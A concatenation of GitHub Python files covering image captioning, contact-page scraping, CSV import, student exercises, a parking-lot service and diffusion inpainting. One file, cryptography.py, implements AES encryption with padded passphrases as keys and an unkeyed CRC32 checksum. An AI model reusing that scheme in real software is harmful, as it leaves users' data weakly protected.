parser.add_argument('--batch_size', type=int, default=5)\n parser.add_argument('--exp_name', type=str, default='Transformer')\n args = parser.parse_args()\n\n print(args)\n\n # Pipeline for image regions\n image_field = ImageDetectionsField(detections_path=args.features_path, max_detections=50, load_in_tmp=False)\n\n # Pipeline for text\n text_field = TextField(init_token='', eos_token='', lower=True, tokenize='spacy',\n remove_punctuation=True, nopoints=False) \n \n # Create the dataset\n dataset = COCO(image_field, text_field, 'COCO/images/', args.annotation_folder, args.annotation_folder)\n train_dataset, val_dataset, test_dataset = dataset.splits \n dict_dataset_val = val_dataset.image_dictionary({'image': image_field, 'text': RawField()})\n dict_dataset_test = test_dataset.image_dictionary({'image': image_field, 'text': RawField()})\n\n if not os.path.isfile('vocab_%s.pkl' % args.exp_name):\n print(\"Building vocabulary\")\n text_field.build_vocab(train_dataset, val_dataset, min_freq=5)\n pickle.dump(text_field.vocab, open('vocab_%s.pkl' % args.exp_name, 'wb'))\n else:\n text_field.vocab = pickle.load(open('vocab_%s.pkl' % args.exp_name, 'rb')) \n \n # print(text_field.vocab.freqs) \n # Model Load\n encoder = VisualEncoder(3, 0, attention_module=ScaledDotProductAttention) \n decoder = CaptionDecoder(len(text_field.vocab), 54, 3, text_field.vocab.stoi['']) \n model = Transformer(text_field.vocab.stoi[''], encoder, decoder).to(device) \n \n dict_dataset_train = train_dataset.image_dictionary({'image': image_field, 'text': RawField()}) \n ref_caps_train = list(train_dataset.text)\n cider_train = Cider(PTBTokenizer.tokenize(ref_caps_train))\n\n def lambda_lr(s):\n warm_up = 10000\n s += 1\n return (model.d_model ** -.5) * min(s ** -.5, s * warm_up ** -1.5)\n\n # Initial conditions\n start_epoch = 0 \n optim = Adam(model.parameters(), lr=1, betas=(0.9, 0.98)) \n scheduler = LambdaLR(optim, lambda_lr) \n loss_fn = NLLLoss(ignore_index=text_field.vocab.stoi[''])\n use_rl = False \n best_cider = .0\n patience = 0\n\n\n print('Training begins!')\n for e in range(start_epoch, start_epoch+80): \n dataloader_train = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=False, num_workers=args.workers, drop_last=True)\n dict_dataloader_val = DataLoader(dict_dataset_val, batch_size=args.batch_size // 5) \n dict_dataloader_train = DataLoader(dict_dataset_train, batch_size=args.batch_size // 5, shuffle=False,\n num_workers=args.workers)\n dict_dataloader_test = DataLoader(dict_dataset_test, batch_size=args.batch_size // 5)\n\n if not use_rl:\n train_loss = train_xe(model, dataloader_train, optim, text_field)\n else: \n train_loss, reward, reward_baseline = train_scst(model, dict_dataloader_train, optim, cider_train, text_field)\n # Validation scores \n scores = evaluate_metrics(model, dict_dataloader_val, text_field)\n print(\"Validation scores\", scores)\n \n val_cider = scores['CIDEr']\n\n # Test scores\n scores = evaluate_metrics(model, dict_dataloader_test, text_field)\n print(\"Test scores\", scores)\n\n # Prepare for next epoch\n best = False\n if val_cider >= best_cider:\n best_cider = val_cider\n patience = 0\n best = True\n else:\n patience += 1\n\n switch_to_rl = False\n exit_train = False\n if patience == 5:\n if not use_rl:\n use_rl = True\n switch_to_rl = True\n patience = 0\n optim = Adam(model.parameters(), lr=5e-6)\n print(\"Switching to RL\")\n else:\n print('patience reached.')\n exit_train = True\n \n torch.save({\n 'torch_rng_state': torch.get_rng_state(),\n 'numpy_rng_state': np.random.get_state(),\n 'random_rng_state': random.getstate(),\n 'epoch': e,\n 'state_dict': model.state_dict(),\n 'optimizer': optim.state_dict(),\n 'scheduler': scheduler.state_dict(),\n 'use_rl': use_rl,\n }, 'ckpt/%s_last.pth' % args.exp_name) \n \n if best:\n copyfile('ckpt/%s_last.pth' % args.exp_name, 'ckpt/%s_best.pth' % args.exp_name)\n \n if exit_train: \n break \n \n","repo_name":"feizc/Diverse-Image-Caption","sub_path":"train_Transformer.py","file_name":"train_Transformer.py","file_ext":"py","file_size_in_byte":9887,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"32562324457","text":"import json\nimport pprint\nimport xlsxwriter\nimport time\nimport csv\n\nimport pprint\nimport sys\nimport pandas as pd\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import NoSuchElementException\n\nimport re \n\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv() # read .env file\n\nchrome_options = Options()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument(\"window-size=1920x1080\")\ndriver = webdriver.Chrome('chromedriver.exe') \ndf = pd.DataFrame(columns=['website','phone numbers', 'email'])\n\n\ndef searchRegex(page_src, url):\n global df\n pattern = re.compile(r\"(\\([0-9]{3}\\)\\s?|[0-9]{3}-)[0-9]{3}-[0-9]{4}\")\n phone_num = re.search(pattern, page_src)\n\n if phone_num: \n print(f'Found: {phone_num.group()} from {url} using regex')\n \n new_row = {'website': url, 'phone numbers': phone_num.group()}\n df = df.append(new_row, ignore_index=True)\n else:\n print(f'NOT FOUND at {url} using regex')\n new_row = {'website': url, 'phone numbers': 'NOT FOUND'}\n df = df.append(new_row, ignore_index=True)\n\ndef getData(url):\n global df\n try:\n phone_num_elem = driver.find_element_by_css_selector('a[href^=\"tel:\"')\n phone_num = phone_num_elem.get_attribute('href')\n # phone_num = phone_num_elem.get_attribute('innerText')\n\n except NoSuchElementException:\n print(\"can't find phone number using a tag\")\n searchRegex(driver.page_source, url)\n\n else:\n print(f'Found: {phone_num} from {url} using css selector')\n\n new_row = {'website': url, 'phone numbers': phone_num}\n df = df.append(new_row, ignore_index=True)\n\ndef main(): \n global df\n f = open('websites.json')\n data = json.load(f)\n\n websites = data['websites']\n url = 'https://www.arronco.com/'\n # for url in websites:\n print(url)\n driver.get(url)\n\n try: \n contact_button = driver.find_element_by_xpath(\"//a[./span[contains(text(),'CONTACT') or contains(text(),'Contact')]] | //a[contains(text(),'CONTACT') or contains(text(),'Contact')]\")\n except NoSuchElementException:\n print(\"Can't find the contact button\")\n getData(url)\n else:\n contact_link = contact_button.get_attribute('href')\n print(contact_link)\n try:\n driver.get(contact_link)\n except Exception as e:\n print('An exception occured: ', e)\n driver.get(url)\n getData(url)\n else:\n getData(contact_link)\n \n # pprint.pprint(df)\n # df.to_excel(\"websites_data_tes.xlsx\")\n driver.quit()\n\nif __name__ == \"__main__\":\n main()","repo_name":"robor-systems/custom-scrappers","sub_path":"selenium/contact_info_SIS/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16381990689","text":"\"\"\"\nThis module provides the functionality to \nread and write CSV files from FC data. \n\"\"\"\nfrom data.io import FILE_INPUT, FILE_OUTPUT\nfrom display.dialogs import ValidatedDialog\nfrom plugins.pluginbase import IOPlugin \n\nfrom numpy import loadtxt\nimport wx\n\nimport csv\n\n__all__ = ['register_csv']\n\nclass CSVPlugin(IOPlugin):\n \"\"\"Read and write CSV files.\"\"\"\n def __init__(self, filename=None, fcData=None, window=None):\n super(CSVPlugin, self).__init__(filename, fcData, window)\n \n def register(self):\n return {FILE_INPUT: self.load, FILE_OUTPUT: self.save}\n \n @property\n def FileType(self):\n return 'Comma Separated Values (*.csv)|*.csv' \n \n def load(self):\n \"\"\"\n Load the specified FACS data file. It is assumed that the first line\n of the file contains the column labels.\n \n @type filename: string\n @param filename: The name of the FACS data file to be loaded\n \n @rtype: tuple\n @return: A tuple containing a list of column labels and numpy array \n containing the actual FACS data.\n \"\"\"\n # display options dialog first\n delim = ','\n skiprows = 1\n commentChar = '#'\n dlg = CSVOptionsDialog(self.window)\n if dlg.ShowModal() == wx.ID_OK:\n delim = dlg.Delimiter\n skiprows = dlg.HeaderLineNumber\n commentChar = dlg.CommentCharacter\n dlg.Destroy() \n \n # Retrieve first line of column labels\n with open(self.filename,'r') as fcFile:\n for i, line in enumerate(fcFile):\n if i < skiprows:\n labels = line\n else:\n break\n labels = labels.rstrip().replace('\"','').replace(\"'\",'').split(delim)\n \n # load actual data\n try:\n data = loadtxt(self.filename, comments=commentChar, delimiter=delim, skiprows=skiprows)\n except Exception:\n wx.MessageBox(\"Please ensure there are no missing values and that correct values for the CSV options were specified.\",\n \"Data Loading Error\", wx.OK | wx.ICON_ERROR)\n return\n \n # text annotations\n textAnn = {'file name': self.filename}\n textAnn['events'] = len(data)\n \n return (labels, data, {'text': textAnn})\n \n else:\n dlg.Destroy() \n\n\n \n def save(self):\n \"\"\"\n Save the supplied Flow Cytometry data to a comma separated value file.\n \"\"\"\n writer = csv.writer(open(self.filename, 'w'), delimiter=',')\n writer.writerow(self.fcData.labels)\n writer.writerows(self.fcData.data)\n \n \n \nimport display.formatters as f\n\nclass CSVOptionsDialog(ValidatedDialog):\n def __init__(self, parent):\n wx.Dialog.__init__(self, parent, wx.ID_ANY, 'CSV File Import Options', size=(250, 200))\n self.CenterOnParent()\n \n # form controls\n self.txtHeaderLine = wx.TextCtrl(self, wx.ID_ANY, '1', size=(50,20))\n self.txtCommentChar = wx.TextCtrl(self, wx.ID_ANY, '#', size=(50,20))\n self.txtDelimiter = wx.TextCtrl(self, wx.ID_ANY, ',', size=(50,20))\n \n # create a table of label-input controls\n self.formSizer = wx.GridSizer(3, 2, vgap=20)\n self.formSizer.Add(wx.StaticText(self, wx.ID_ANY, 'Header line number:'), 1, wx.EXPAND | wx.ALIGN_RIGHT)\n self.formSizer.Add(self.txtHeaderLine, 1)\n self.formSizer.Add(wx.StaticText(self, wx.ID_ANY, 'Comment character:'), 1, wx.EXPAND | wx.ALIGN_RIGHT)\n self.formSizer.Add(self.txtCommentChar, 1)\n self.formSizer.Add(wx.StaticText(self, wx.ID_ANY, 'Delimiter:'), 1, wx.EXPAND | wx.ALIGN_RIGHT)\n self.formSizer.Add(self.txtDelimiter, 1)\n \n # create the button row\n self.buttonSizer = self.CreateButtonSizer(wx.OK | wx.CANCEL | wx.HELP)\n self.buttonSizer.AffirmativeButton.Bind(wx.EVT_BUTTON, super(CSVOptionsDialog, self).cmdOK_click)\n self.buttonSizer.HelpButton.Bind(wx.EVT_BUTTON, self.cmdHelp_Click)\n \n # main sizer\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n self.sizer.Add(self.formSizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 20)\n self.sizer.Add(self.buttonSizer, 0, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP | wx.BOTTOM, 20)\n self.SetSizer(self.sizer)\n \n \n @property\n def CommentCharacter(self):\n return self.txtCommentChar.Value\n \n @property\n def Delimiter(self):\n return self.txtDelimiter.Value\n \n @property\n def HeaderLineNumber(self):\n return int(self.txtHeaderLine.Value)\n\n def validate(self):\n intVal = f.IntFormatter()\n msg = []\n \n if not intVal.validate(self.txtHeaderLine.Value):\n msg.append(\"Header line number: A valid number must be entered.\")\n elif int(self.txtHeaderLine.Value) <= 0:\n msg.append(\"Header line number: Please enter a number larger than 0.\")\n \n return msg\n \n \n def cmdHelp_Click(self, event):\n from display.help import HelpDialog\n HelpDialog(self, \"CSV Import Help\", htmlfile=\"help/csv_import.html\", size=(300,200)).Show()\n\n\ndef register_csv():\n return ('csv', CSVPlugin)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"smdabdoub/find","sub_path":"plugins/IO/csv_io.py","file_name":"csv_io.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21486354298","text":"\"\"\"Problema 3.2\"\"\"\n\"\"\"Verificar se um numero eh triangular\"\"\"\nprint(\"Dado um numero inteiro, esse algoritmo verifica se ele eh triangular\")\nn = int(input(\"digite o valor de n:\"))\ni = 1\nwhile i * (i + 1) * (i + 2) < n:\n i = i + 1\nif i * (i + 1) * (i + 2) == n:\n print(\">>> %d eh o produto %d %d %d\" % (n, i, i + 1, i + 2))\n print(\"Portanto\", n, \"eh triangular\")\nelse:\n print((\"%d nao eh triangular\") % (n))\nfim = input(\"tecle enter para encerrar\")\n","repo_name":"Gui-FernandesBR/MAC2166-2018","sub_path":"examples/2_ints/Problem3.2.py","file_name":"Problem3.2.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23824300618","text":"#!/usr/bin/python\n# -*- coding: UTF-8\n\noutFile = \"./stu_eu_layer_grid.csv\"\n#sidFile = \"./hermes/soil_lookup.csv\"\nlat_lon_up = (51.959284, 13.928282)\nlat_lon_down = (51.795406, 14.160063)\n\ndef findAllSoilRef() :\n\n outSet = set()\n with open(outFile) as sourcefile:\n #Column_,Row,Grid_Code,Location,elevation,latitude,longitude,soil_ref\n firstLine = True\n header = dict()\n for line in sourcefile:\n if firstLine :\n firstLine = False\n header = ReadHeader(line)\n continue\n\n out = loadLine(line)\n latitude = float(out[header[\"latitude\"]])\n longitude = float(out[header[\"longitude\"]])\n soil_ref = out[header[\"soil_ref\"]]\n\n if latitude <= lat_lon_up[0] and latitude >= lat_lon_down[0] and longitude >= lat_lon_up[1] and longitude <= lat_lon_down[1] :\n outSet.add(soil_ref)\n\n # with open(sidFile) as sourcefile:\n # #soil_ref,SID\n # firstLine = True\n # header = dict()\n # for line in sourcefile:\n # if firstLine :\n # firstLine = False\n # header = ReadHeader(line)\n # continue\n # out = loadLine(line)\n # soil_ref = out[header[\"soil_ref\"]]\n # SID = out[header[\"SID\"]]\n # if soil_ref in outSet :\n # print(soil_ref, SID )\n \n outList = sorted(outSet)\n #print(outList)\n for item in outList :\n print(item)\n\n\ndef ReadHeader(line) : \n colDic = dict()\n tokens = line.split(\",\")\n i = -1\n for token in tokens :\n token = token.strip()\n i = i+1\n colDic[token] = i\n return colDic\n\ndef loadLine(line) :\n # read relevant content from line \n tokens = line.split(\",\")\n numCOl = len(tokens) \n out = [\"\"] * (numCOl)\n for i in range(numCOl):\n out[i] = tokens[i].strip()\n return out\n\nif __name__ == \"__main__\":\n findAllSoilRef()","repo_name":"zalf-rpm/soybean-EU","sub_path":"getgrid_window_by_lat_lon.py","file_name":"getgrid_window_by_lat_lon.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"5628158856","text":"import zlib\nimport struct\nfrom Crypto.Cipher import AES\n\n\nclass cryptography:\n def __init__(self, parent=None):\n return None\n\n def _lazysecret( self, secret, blocksize=32, padding='}'):\n \"\"\"pads secret if not legal AES block size (16, 24, 32)\"\"\"\n if not len(secret) in (16, 24, 32):\n return secret + (blocksize - len(secret)) * padding\n return secret\n\n def encrypt( self, plaintext, secret, lazy=True, checksum=True):\n \"\"\"encrypt plaintext with secret\n plaintext - content to encrypt\n secret - secret to encrypt plaintext\n lazy - pad secret if less than legal blocksize (default: True)\n checksum - attach crc32 byte encoded (default: True)\n returns ciphertext\n \"\"\"\n secret = self._lazysecret(secret) if lazy else secret\n encobj = AES.new(secret, AES.MODE_CFB)\n if checksum:\n plaintext += struct.pack(\"i\", zlib.crc32(plaintext))\n return encobj.encrypt(plaintext)\n \n def decrypt( self, ciphertext, secret, lazy=True, checksum=True):\n \"\"\"decrypt ciphertext with secret\n ciphertext - encrypted content to decrypt\n secret - secret to decrypt ciphertext\n lazy - pad secret if less than legal blocksize (default: True)\n checksum - verify crc32 byte encoded checksum (default: True)\n returns plaintext\n \"\"\"\n secret = self._lazysecret(secret) if lazy else secret\n encobj = AES.new(secret, AES.MODE_CFB)\n plaintext = encobj.decrypt(ciphertext)\n if checksum:\n crc, plaintext = (plaintext[-4:], plaintext[:-4])\n if not crc == struct.pack(\"i\", zlib.crc32(plaintext)):\n raise CheckSumError(\"checksum mismatch\")\n return plaintext\n\n def encrypt_file( self, input_filename, output_filename, secret_key):\n file_input = open(input_filename, 'r')\n z = self.encrypt( file_input.read(), secret_key )\n file_input.close()\n file_output = open( output_filename, 'w')\n file_output.write(z)\n file_output.close()\n\n def decrypt_file( self, input_filename, output_filename, secret_key):\n file_input = open(input_filename, 'r')\n z = self.decrypt( file_input.read(), secret_key )\n file_input.close()\n file_output = open( output_filename, 'w')\n file_output.write(z)\n file_output.close()\n\nclass CheckSumError(Exception):\n pass\n\n","repo_name":"rohit01/stegosoft","sub_path":"StegoSoft/Project_folder/cryptography.py","file_name":"cryptography.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8395695422","text":"import traceback\n\nfrom automated_parking_system import constants\nfrom automated_parking_system.models.parking_slot import ParkingSlot\nfrom automated_parking_system.services.base_service import BaseService\n\n\nclass ParkingSlotService(BaseService):\n @classmethod\n def initialize_slots(cls, parking_obj):\n try:\n n = len(parking_obj.slots)\n for i in range(0, n):\n parking_obj.slots[i] = ParkingSlot(i+1)\n return parking_obj\n except Exception as e:\n print(\"Exception in initializing slots \", traceback.print_exc(),\n e)\n return None\n\n @classmethod\n def park_car_at_slot(cls, slot_obj, car):\n try:\n slot_obj.set_car(car)\n slot_obj.set_status(constants.FULL)\n except Exception as e:\n print(\"Exception in initializing parking car at a slot %s \", slot_obj.slot_id,\n traceback.print_exc(),e)\n raise e\n\n @classmethod\n def vacate_slot(cls, slot_obj):\n try:\n slot_obj.set_car(None)\n slot_obj.set_status(constants.EMPTY)\n except Exception as e:\n print(\"Exception in initializing parking car at a slot %s \", slot_obj.slot_id,\n traceback.print_exc(), e)\n raise e\n\n @classmethod\n def update_slot_status(cls, slot_obj, status):\n slot_obj.set_status(status)\n\n @classmethod\n def get_slot_status(cls, slot_obj):\n return slot_obj.status\n\n","repo_name":"snehilrastogi/low_level_design","sub_path":"parkinglot/automated_parking_system/services/parking_slot_service.py","file_name":"parking_slot_service.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11904353781","text":"inventory={}\nadd=0\nctr=0\nstonks=0\nrefer=[\"shoes\",\"socks\",\"belts\",\"shiners\",\"bags\"]\ns=int(input())\nfor i in range(0,s):\n item=input()\n icost=float(input())\n istock=int(input())\n inventory[item]=(icost,istock)\n add=add+(icost*istock)\n stonks+=istock\nfor i in refer:\n if ctr==len(inventory):\n break\n tempVal=inventory[i]\n cost,stock=tempVal[0],tempVal[1]\n tot=cost*stock\n print(i)\n print('%.2f'%tot)\n ctr+=1\nprint(stonks)\nprint('%.2f'%add)\n","repo_name":"Shantanu1890/the-Qs-and-the-As","sub_path":"Python/shops.py","file_name":"shops.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16114410853","text":"#ex 1\n\nmy_fav_numbers = {3, 7, 9, 15, 42}\n\nmy_fav_numbers.add(11)\nmy_fav_numbers.add(23)\n\nmy_fav_numbers.pop()\n\nfriend_fav_numbers = {4, 8, 12, 16, 20}\n\nour_fav_numbers = my_fav_numbers.union(friend_fav_numbers)\n\nprint(\"Our favorite numbers:\", our_fav_numbers)\n\n#ex 2\n\noriginal_tuple = (1, 2, 3)\nnew_elements = (4, 5)\n\nnew_tuple = original_tuple + new_elements\n\nprint(new_tuple)\n\n#ex 3\nbasket = [\"Banana\", \"Apples\", \"Oranges\", \"Blueberries\"]\n\nbasket.remove(\"Banana\")\n\nbasket.remove(\"Blueberries\")\n\nbasket.append(\"Kiwi\")\n\nbasket.insert(0, \"Apples\")\n\napple_count = basket.count(\"Apples\")\n\nprint(\"Number of Apples in the basket:\", apple_count)\n\nbasket.clear()\n\nprint(\"Basket after emptying:\", basket)\n\n#ex 4\n\nsequence = [x * 0.5 for x in range(3, 11)]\nprint(sequence)\n\n\n#ex 5\n\nfor number in range(1, 21):\n print(number)\n\n\nfor number in range(1, 21):\n if number % 2 == 0:\n print(number)\n\n\n#ex 6\n\nmy_name = \"Vlad\"\n\nwhile True:\n user_name = input(\"Please enter your name: \")\n\n if user_name == my_name:\n print(\"Hey, that's my name too!\")\n break\n\n#ex 7\n\nfavorite_fruits_input = input(\"Enter your favorite fruits, separated by a space: \")\n\nfavorite_fruits = favorite_fruits_input.split()\n\nchosen_fruit = input(\"Enter the name of a fruit: \")\n\nif chosen_fruit in favorite_fruits:\n print(\"You chose one of your favorite fruits! Enjoy!\")\nelse:\n print(\"You chose a new fruit. I hope you enjoy.\")\n\n#ex 8\n\ntoppings = []\ntopping_price = 2.5\nbase_price = 10\n\nprint(\"Please enter toppings for your pizza. Enter 'quit' when you are done.\")\n\nwhile True:\n topping = input(\"Add a topping: \")\n\n if topping.lower() == 'quit':\n break\n\n toppings.append(topping)\n print(f\"{topping} added to your pizza!\")\n\ntotal_price = base_price + topping_price * len(toppings)\n\nprint(\"\\nYour pizza toppings are:\")\nfor t in toppings:\n print(f\" - {t}\")\n\nprint(f\"Total price: ${total_price:.2f}\")\n\n#ex 9\n\nnum_family_members = int(input(\"How many family members are there? \"))\n\ntotal_cost = 0\n\nfor i in range(num_family_members):\n age = int(input(f\"Enter the age of family member {i+1}: \"))\n if age < 3:\n continue\n elif 3 <= age <= 12:\n total_cost += 10\n else:\n total_cost += 15\n\nprint(f\"The total cost for the family's tickets is: ${total_cost}\")\n\nteenagers = [\"Alice\", \"Bob\", \"Charlie\", \"Diana\", \"Ethan\"]\n\nallowed_to_watch = []\n\n\nfor teen in teenagers:\n age = int(input(f\"Enter the age of {teen}: \"))\n if 16 <= age <= 21:\n allowed_to_watch.append(teen)\n\n\nprint(\"Teenagers allowed to watch the movie:\", allowed_to_watch)\n\n#ex 10\n\nsandwich_orders = [\"Tuna sandwich\", \"Pastrami sandwich\", \"Avocado sandwich\", \"Pastrami sandwich\", \"Egg sandwich\", \"Chicken sandwich\", \"Pastrami sandwich\"]\n\nwhile \"Pastrami sandwich\" in sandwich_orders:\n sandwich_orders.remove(\"Pastrami sandwich\")\n\nfinished_sandwiches = []\n\nfor sandwich in sandwich_orders:\n print(f\"I made your {sandwich.lower()}\")\n finished_sandwiches.append(sandwich)\n\nprint(\"\\nAll sandwiches made:\")\nfor sandwich in finished_sandwiches:\n print(sandwich)\n\n\n","repo_name":"vladislavkleiman/DI_Bootcamp","sub_path":"week_18/day_4/ex_xp.py","file_name":"ex_xp.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31993599275","text":"import os\nimport cv2\nimport sys\nimport glob\nimport argparse\nimport torch\nimport numpy as np\nimport PIL.Image as Image\nfrom pathlib import Path\nfrom diffusers import StableDiffusionInpaintPipeline\nfrom diffusers import DPMSolverMultistepScheduler\nfrom matplotlib import pyplot as plt\nfrom typing import Tuple\nprint(f\"model load info : StableDiffusion model load success\")\ndef resize_and_pad(image: np.ndarray, mask: np.ndarray, target_size: int = 512) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Resizes an image and its corresponding mask to have the longer side equal to `target_size` and pads them to make them\n both have the same size. The resulting image and mask have dimensions (target_size, target_size).\n\n Args:\n image: A numpy array representing the image to resize and pad.\n mask: A numpy array representing the mask to resize and pad.\n target_size: An integer specifying the desired size of the longer side after resizing.\n\n Returns:\n A tuple containing two numpy arrays - the resized and padded image and the resized and padded mask.\n \"\"\"\n height, width, _ = image.shape\n max_dim = max(height, width)\n scale = target_size / max_dim\n new_height = int(height * scale)\n new_width = int(width * scale)\n image_resized = cv2.resize(image, (new_width, new_height), interpolation=cv2.INTER_LINEAR)\n mask_resized = cv2.resize(mask, (new_width, new_height), interpolation=cv2.INTER_LINEAR)\n pad_height = target_size - new_height\n pad_width = target_size - new_width\n top_pad = pad_height // 2\n bottom_pad = pad_height - top_pad\n left_pad = pad_width // 2\n right_pad = pad_width - left_pad\n image_padded = np.pad(image_resized, ((top_pad, bottom_pad), (left_pad, right_pad), (0, 0)), mode='constant')\n mask_padded = np.pad(mask_resized, ((top_pad, bottom_pad), (left_pad, right_pad)), mode='constant')\n return image_padded, mask_padded, (top_pad, bottom_pad, left_pad, right_pad)\n\ndef recover_size(image_padded: np.ndarray, mask_padded: np.ndarray, orig_size: Tuple[int, int], \n padding_factors: Tuple[int, int, int, int]) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Resizes a padded and resized image and mask to the original size.\n\n Args:\n image_padded: A numpy array representing the padded and resized image.\n mask_padded: A numpy array representing the padded and resized mask.\n orig_size: A tuple containing two integers - the original height and width of the image before resizing and padding.\n\n Returns:\n A tuple containing two numpy arrays - the recovered image and the recovered mask with dimensions `orig_size`.\n \"\"\"\n h,w,c = image_padded.shape\n top_pad, bottom_pad, left_pad, right_pad = padding_factors\n image = image_padded[top_pad:h-bottom_pad, left_pad:w-right_pad, :]\n mask = mask_padded[top_pad:h-bottom_pad, left_pad:w-right_pad]\n image_resized = cv2.resize(image, orig_size[::-1], interpolation=cv2.INTER_LINEAR)\n mask_resized = cv2.resize(mask, orig_size[::-1], interpolation=cv2.INTER_LINEAR)\n return image_resized, mask_resized\n\ndef crop_for_filling_pre(image: np.array, mask: np.array, crop_size: int = 512):\n # Calculate the aspect ratio of the image\n height, width = image.shape[:2]\n aspect_ratio = float(width) / float(height)\n\n # If the shorter side is less than 512, resize the image proportionally\n if min(height, width) < crop_size:\n if height < width:\n new_height = crop_size\n new_width = int(new_height * aspect_ratio)\n else:\n new_width = crop_size\n new_height = int(new_width / aspect_ratio)\n\n image = cv2.resize(image, (new_width, new_height))\n mask = cv2.resize(mask, (new_width, new_height))\n\n # Find the bounding box of the mask\n x, y, w, h = cv2.boundingRect(mask)\n\n # Update the height and width of the resized image\n height, width = image.shape[:2]\n\n # # If the 512x512 square cannot cover the entire mask, resize the image accordingly\n if w > crop_size or h > crop_size:\n # padding to square at first\n if height < width:\n padding = width - height\n image = np.pad(image, ((padding // 2, padding - padding // 2), (0, 0), (0, 0)), 'constant')\n mask = np.pad(mask, ((padding // 2, padding - padding // 2), (0, 0)), 'constant')\n else:\n padding = height - width\n image = np.pad(image, ((0, 0), (padding // 2, padding - padding // 2), (0, 0)), 'constant')\n mask = np.pad(mask, ((0, 0), (padding // 2, padding - padding // 2)), 'constant')\n\n resize_factor = crop_size / max(w, h)\n image = cv2.resize(image, (0, 0), fx=resize_factor, fy=resize_factor)\n mask = cv2.resize(mask, (0, 0), fx=resize_factor, fy=resize_factor)\n x, y, w, h = cv2.boundingRect(mask)\n\n # Calculate the crop coordinates\n crop_x = min(max(x + w // 2 - crop_size // 2, 0), width - crop_size)\n crop_y = min(max(y + h // 2 - crop_size // 2, 0), height - crop_size)\n\n # Crop the image\n cropped_image = image[crop_y:crop_y + crop_size, crop_x:crop_x + crop_size]\n cropped_mask = mask[crop_y:crop_y + crop_size, crop_x:crop_x + crop_size]\n\n return cropped_image, cropped_mask\n \ndef crop_for_filling_post(\n image: np.array,\n mask: np.array,\n filled_image: np.array, \n crop_size: int = 512,\n ):\n image_copy = image.copy()\n mask_copy = mask.copy()\n # Calculate the aspect ratio of the image\n height, width = image.shape[:2]\n height_ori, width_ori = height, width\n aspect_ratio = float(width) / float(height)\n\n # If the shorter side is less than 512, resize the image proportionally\n if min(height, width) < crop_size:\n if height < width:\n new_height = crop_size\n new_width = int(new_height * aspect_ratio)\n else:\n new_width = crop_size\n new_height = int(new_width / aspect_ratio)\n\n image = cv2.resize(image, (new_width, new_height))\n mask = cv2.resize(mask, (new_width, new_height))\n\n # Find the bounding box of the mask\n x, y, w, h = cv2.boundingRect(mask)\n\n # Update the height and width of the resized image\n height, width = image.shape[:2]\n\n # # If the 512x512 square cannot cover the entire mask, resize the image accordingly\n if w > crop_size or h > crop_size:\n flag_padding = True\n # padding to square at first\n if height < width:\n padding = width - height\n image = np.pad(image, ((padding // 2, padding - padding // 2), (0, 0), (0, 0)), 'constant')\n mask = np.pad(mask, ((padding // 2, padding - padding // 2), (0, 0)), 'constant')\n padding_side = 'h'\n else:\n padding = height - width\n image = np.pad(image, ((0, 0), (padding // 2, padding - padding // 2), (0, 0)), 'constant')\n mask = np.pad(mask, ((0, 0), (padding // 2, padding - padding // 2)), 'constant')\n padding_side = 'w'\n\n resize_factor = crop_size / max(w, h)\n image = cv2.resize(image, (0, 0), fx=resize_factor, fy=resize_factor)\n mask = cv2.resize(mask, (0, 0), fx=resize_factor, fy=resize_factor)\n x, y, w, h = cv2.boundingRect(mask)\n else:\n flag_padding = False\n\n # Calculate the crop coordinates\n crop_x = min(max(x + w // 2 - crop_size // 2, 0), width - crop_size)\n crop_y = min(max(y + h // 2 - crop_size // 2, 0), height - crop_size)\n\n # Fill the image\n image[crop_y:crop_y + crop_size, crop_x:crop_x + crop_size] = filled_image\n if flag_padding:\n image = cv2.resize(image, (0, 0), fx=1/resize_factor, fy=1/resize_factor)\n if padding_side == 'h':\n image = image[padding // 2:padding // 2 + height_ori, :]\n else:\n image = image[:, padding // 2:padding // 2 + width_ori]\n\n image = cv2.resize(image, (width_ori, height_ori))\n\n image_copy[mask_copy==255] = image[mask_copy==255]\n return image_copy\n\ndef fill_img_with_sd(\n img: np.ndarray,\n mask: np.ndarray,\n text_prompt: str,\n device=\"cuda\"\n):\n pipe = StableDiffusionInpaintPipeline.from_pretrained(\n \"stabilityai/stable-diffusion-2-inpainting\",\n torch_dtype=torch.float32,\n ).to(device)\n generator = torch.Generator(\"cuda\").manual_seed(0)\n pipe.scheduler = DPMSolverMultistepScheduler.from_config(pipe.scheduler.config)\n img_crop, mask_crop = 